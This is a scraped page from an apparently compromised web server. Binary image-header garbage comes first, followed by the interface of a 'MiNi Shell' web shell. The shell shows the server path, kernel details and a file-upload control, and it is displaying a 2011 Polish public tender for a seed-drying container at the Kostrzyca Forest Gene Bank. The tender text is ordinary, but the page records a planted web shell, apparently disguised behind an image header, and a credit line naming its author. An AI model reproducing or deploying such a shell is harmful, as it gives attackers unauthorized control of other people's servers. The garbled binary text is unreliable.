JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111107/289855-N-2011.html

<p class="kh_header"><b>Miłków: Dostawa suchego kontenera w ramach projektu Ochrona ex situ zagrożonych i chronionych roślin, dziko rosnących w zachodniej części Polski.</b><br>
<b>Numer ogłoszenia: 289855 - 2011; data zamieszczenia: 07.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Leśny Bank Genów Kostrzyca , Miłków 300, 58-535 Miłków, woj. dolnośląskie, tel. 075 7131048, 7131434, faks 075 7131754.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lbg.jgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: LEŚNICTWO.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa suchego kontenera w ramach projektu Ochrona ex situ zagrożonych i chronionych roślin, dziko rosnących w zachodniej części Polski..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup, dostawa i umieszczenie w pomieszczeniu wskazanym przez Zamawiającego specjalistycznego suchego kontenera w ramach dofinansowanego ze środków V osi priorytetowej Programu Operacyjnego Infrastruktura i Środowisko projektu Ochrona ex situ zagrożonych i chronionych roślin, dziko rosnących w zachodniej części Polski (FlorNaturLBG).Szczegółowy opis przedmiotu zamówienia:1)Przeznaczenie:Podsuszanie nasion przed przechowywaniem do żądanego poziomu wilgotności;Bezpieczne rozważanie nasion już spakowanych bez ryzyka absorpcji wilgoci z otoczenia i zmiany warunków dalszego przechowywania.2)Umiejscowienie suchego kontenera (opis pomieszczenia):
a)Umiejscowienie suchego kontenera w pomieszczeniu wskazanym przez Zamawiającego znajdującym się w siedzibie Zamawiającego;b)Parametry pomieszczenia, w którym zostanie umieszczony suchy kontener:długość: 8, 800 m, 
szerokość: 4, 00 m, wysokość 3, 10 m; c)Elementy konstrukcyjne w pomieszczeniu: 2 słupy 2xC140; d)Urządzenia znajdujące się w pomieszczeniu:Instalacja solarna: zbiornik ciepłej wody użytkowej 500l, w izolacji z pianki poliuretanowej wraz z osprzętem - pompa solarna obiegowa, sterowniki;Uwaga: ściana suchego kontenera musi znajdować się w odległości 1, 20 m od słupa na którym znajduje się instalacja solarna; e)Obecnie warunki mikroklimatyczne panujące w pomieszczeniu kształtują się na poziomie:temperatura ok. 20°C, wilgotność ok. 40%; f)Aktualne przeznaczenie pomieszczenia - magazyn; g)Kompletny obiekt, jakim jest suchy kontener będzie ustawiony na podłodze budynku; h)Planuje się zamianę dwuskrzydłowych drzwi otwieranych do wewnątrz pomieszczenia magazynowego na drzwi jednoskrzydłowe otwierane na zewnątrz; Szkic pomieszczenia, w którym zostanie umieszczony suchy kontener - załącznik nr 7 do SIWZ. Uwaga: Na życzenie Wykonawcy Zamawiający udostępni plany sytuacyjne oraz umożliwi wizję lokalną przed złożeniem oferty.
3)Wymagania zapewnienia warunków mikroklimatycznych wewnątrz suchego kontenera: a)Wilgotność względna: 15RH; przy zastosowaniu urządzeń umożliwiających utrzymanie ustalonego poziomu wilgotności wewnątrz suchego kontenera ;b)Stały poziom temperatury w dwóch możliwych do ustawienia zakresach: 15 lub 20°C; c)Ciągła cyrkulacja powietrza przez urządzenia odwilżające i chłodzące; d)Filtrowanie powietrza urządzeniami odwilżającymi i chłodzącymi;
e)Wymiana powietrza wynikająca z potrzeb użytkowych i funkcji specjalistycznego suchego kontenera, bilansu ciepła i wilgotności oraz zanieczyszczeń stałych i gazowych;f)Strumień powietrza pochodzący z zastosowanych urządzeń nie może być skierowany bezpośrednio na stanowisko pracy; g)Ilość powietrza świeżego nie powinna być mniejsza niż 10% ogólnej ilości wymienianego powietrza.
4)Maksymalne wymiary zewnętrzna suchego kontenera:a)Długość 3, 5 m;
b)Szerokość 2, 7 m; c)Wysokość ~3,1 m (mierząc od podstawy do górnej krawędzi konstrukcji i uwzględniając rzeczywistą wysokość pomieszczenia, w którym będzie zamontowany suchy kontener); Bez uwzględnienia innych elementów niż izolacja i stalowa konstrukcja 5)Minimalne wymiary zewnętrzne suchego kontenera:
a)Długość 3, 4 m; b)Szerokość 2, 6 m;c)Wysokość 2, 9 m (mierząc od podstawy do górnej krawędzi konstrukcji).Uwaga: wewnątrz  suchego  kontenera  wysokość nie  może  być  niższa niż 2, 5 m.Bez uwzględnienia innych elementów niż izolacja i stalowa konstrukcja 6)Konstrukcja suchego kontenera:a)Grubość warstwy izolacyjnej 20 cm; b)Warstwa izolacyjna obejmuje ściany, podłogę i sufit;c)Warstwa izolacyjna zbudowana z płyt warstwowych, z rdzeniem styropianowym, obustronnie pokrytych blachą ocynkowaną, lakierowaną. Kolor płyty warstwowej: RAL 9002 (zgodnie z paletą RAL);d)Izolacja na stalowym stelażu, zastosowanie substancji uszczelniających na wszelkich łączeniach, tak, aby uzyskać gładkie wykończenie i dodatkową ochronę przeciwko obiegowi pary wodnej;e)Konstrukcja sufitu z takich samych materiałów jak ściany, co ma zapewnić wydajność struktury; podłoga również zaizolowana styropianem;f)Podłoga wyłożona blachą aluminiową, ryflowaną.
7)Wyposażenie specjalistycznego suchego kontenera:a)Urządzenia osuszające - osuszacz adsorpcyjny;b)Urządzenia chłodzące;c)Filtry węglowe;d)Wskaźniki pomiaru temperatury, wilgotności oraz poziomu CO2; e)Automatyczny system chłodzenia, wentylacji, utrzymania poziomu temperatury i dostarczania świeżego powietrza;
f)Zasilanie 400V 50Hz;g)Urządzenie alarmowe ALARM - CZŁOWIEK W KOMORZE. Optyczna sygnalizacja stanu alarmowego poprzez zapalenie odpowiedniej lampki w centrali alarmowej (portiernia Leśnego Banku Genów Kostrzyca);h)Lampa UV do sterylizacji z programatorem czasu pracy, emitująca promieniowanie ultrafioletowe o długości fali 250-265 nm. Lampa musi objąć swoim zasięgiem całe wnętrze suchego kontenera skutecznie niszcząc wszelkiego typu bakterie, wirusy, pleśnie i grzyby, nie powodując żadnego skażenia chemicznego i eliminując konieczność stosowania środków chemicznych;i)Oświetlenie: 600-700 Lux;j)Regały stalowe odseparowane w ilości 2 szt., na kółkach, o wysokości 1800 mm (nieprzekraczającej światła drzwi) z regulacją wysokości półek; Ilość półek w pojedynczym regale 6 szt., wymiary półki szerokość: 500 mm, głębokość: 600 mm; położenie najwyższej półki na wysokości 1600 mm od poziomu podłogi, najniżej położona półka na wysokości 200 mm od poziomu podłogi.k)Blat roboczy - śnieżnobiały, wykonany z konglomeratu kwarcowego, matowego o wymiarach (s/w/g): 2000/850/800 mm, grubość blatu 300 mm; l)Stolik z blatem z konglomeratu kwarcowego barwy śnieżnobiałej, matowy, grubość blatu 300 mm, wymiary stolika (s/w/g): 1000/750/800 mm;m)Oświetlenie punktowe stolika.n)Krzesło obrotowe wykonane z tworzywa sztucznego oraz metalu, posiadające oparcie dla części lędźwiowej kręgosłupa, podłokietniki oraz pięcioramienną podstawą jezdną, wyposażoną w kółka. Oparcie i siedzisko nietapicerowane, wykonane z tworzywa sztucznego.o)Półka metalowa o głębokości 25 cm i szerokości 50 cm zamocowana nad stolikiem. 8)Drzwi chłodnicze zamontowane od zewnętrznej strony i otwierane na zewnątrz, lewe.
a)Wymiary: szerokość w świetle 1000 mm; wysokość w świetle 2000 mm
b)Płat  drzwiowy   zbudowany   z  blachy  o   grubości  0,8 mm  kwasoodporna   lub  stalowa gr. 0,5 mm ocynkowana pokryta lakierem poliestrowym o grubości 25 ?m; grubość płata 80 lub 100 mm;  płat wypełniony sztywną pianką poliuretanową o gęstości ok. 40 kg/m3 ;c)Ościeżnica drzwi: blacha gr. 0, 8 mm kwasoodporna lub stalowa gr. 0, 5 mm ocynkowana pokryta lakierem poliestrowym o grubości 25 ?m;
d)Rdzeń: sklejka wodoodporna;e)Bez progu, ale z uszczelką u dołu;f)Z atestem higienicznym;g)Zamek bezpieczny, jeden centralny, drzwi dają się otworzyć od wewnątrz bez użycia klucza; komplet kluczy;h)Klamka - aluminiowa, malowana proszkowo;i)Zawiasy: dwa, aluminiowe;j)Uszczelnienie gumowe; płat drzwiowy wyposażony w uszczelkę obwodową, uszczelniającą styk płata drzwiowego i futryny oraz wyposażony w uszczelkę dolną uszczelniającą styk płata drzwiowego z podłogą.
3.Warunki dodatkowe dotyczące przedmiotu zamówienia 1)Zamawiający wymaga, aby zaoferowane przez Wykonawcę urządzenie objęte przedmiotem niniejszego postępowania:a.było fabrycznie nowe, wolne od wszelkich wad i uszkodzeń, bez wcześniejszej eksploatacji i nie było przedmiotem praw osób trzecich,b.spełniało wszystkie normy stawiane takim towarom przez prawo polskie,c.posiadało odpowiednie pozwolenia dopuszczające do obrotu na terytorium Polski,d.posiadało deklarację zgodności CE na oferowany model.2)Zamawiający wymaga, aby Wykonawca:a.udzielił minimum 24 miesięcy gwarancji na oferowane urządzenie, objęte przedmiotem zamówienia,b.zapewnił serwis pogwarancyjny,c.dostarczył przedmiot zamówienia własnym transportem, na własny koszt i ryzyko, 
w miejsce wskazane przez Zamawiającego,d.zainstalował i uruchomił przedmiot zamówienia oraz przeszkolił pracowników Zamawiającego w zakresie ogólnych zasad działania i obsługi przedmiotu zamówienia,e.dostarczył, w momencie dostawy i odbioru urządzenia w siedzibie Zamawiającego, Instrukcję obsługi oryginalną oraz tłumaczoną na język polski.3)Wymagane jest, aby Wykonawca w celu potwierdzenia spełniania warunków dotyczących przedmiotu zamówienia, o których mowa powyżej, przedstawił w swojej ofercie OPIS TECHNICZNY, tj. informację o oferowanym urządzeniu wg formularza stanowiącego Załącznik 4 do SIWZ.  4)Wymagania stawiane Wykonawcom odnośnie przedmiotu zamówienia:a.Wykonawca odpowiedzialny będzie za terminowe wykonanie zamówienia w okresie realizacji umowy, jak i w okresie gwarancji;b.Wykonawca odpowiedzialny będzie za jakość oraz zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia do czasu wygaśnięcia zobowiązań Wykonawcy wobec Zamawiającego.
5)Ustalenia dotyczące wykonania zamówienia uzgadniane będą wyłącznie przez ustanowionych przedstawicieli Zamawiającego i Wykonawcy.6)Szczegółowe postanowienia dotyczące wykonywania zobowiązań dotyczących realizacji zamówienia, w tym odnoszących się do reklamacji i gwarancji, zawarto we wzorze umowy - załącznik nr 6 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 35.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia, tj. Wykonawca musi wykazać, poprzez załączenie do oferty dokumentów potwierdzających, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej dwie dostawy polegające na dostawie komór klimatycznych, urządzeń laboratoryjnych o wartości:nie mniej niż 50 000,00 zł brutto każda,lub  nie mniej niż 100 000,00 zł. brutto sumaryczna wartość dwóch wykazanych dostaw;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lbg.jgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Leśny Bank Genów, 58-535 Miłków 300,pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2011 godzina 12:00, miejsce: Leśny Bank Genów, 58-535 Miłków 300,pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizację przedmiotu niniejszego zamówienia Zamawiający współfinansuje ze środków V osi priorytetowej Programu Operacyjnego Infrastruktura i Środowisko Ochrona przyrody i kształtowanie postaw ekologicznych, w ramach projektu Ochrona ex situ zagrożonych i chronionych roślin, dziko rosnących w zachodniej części Polski..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com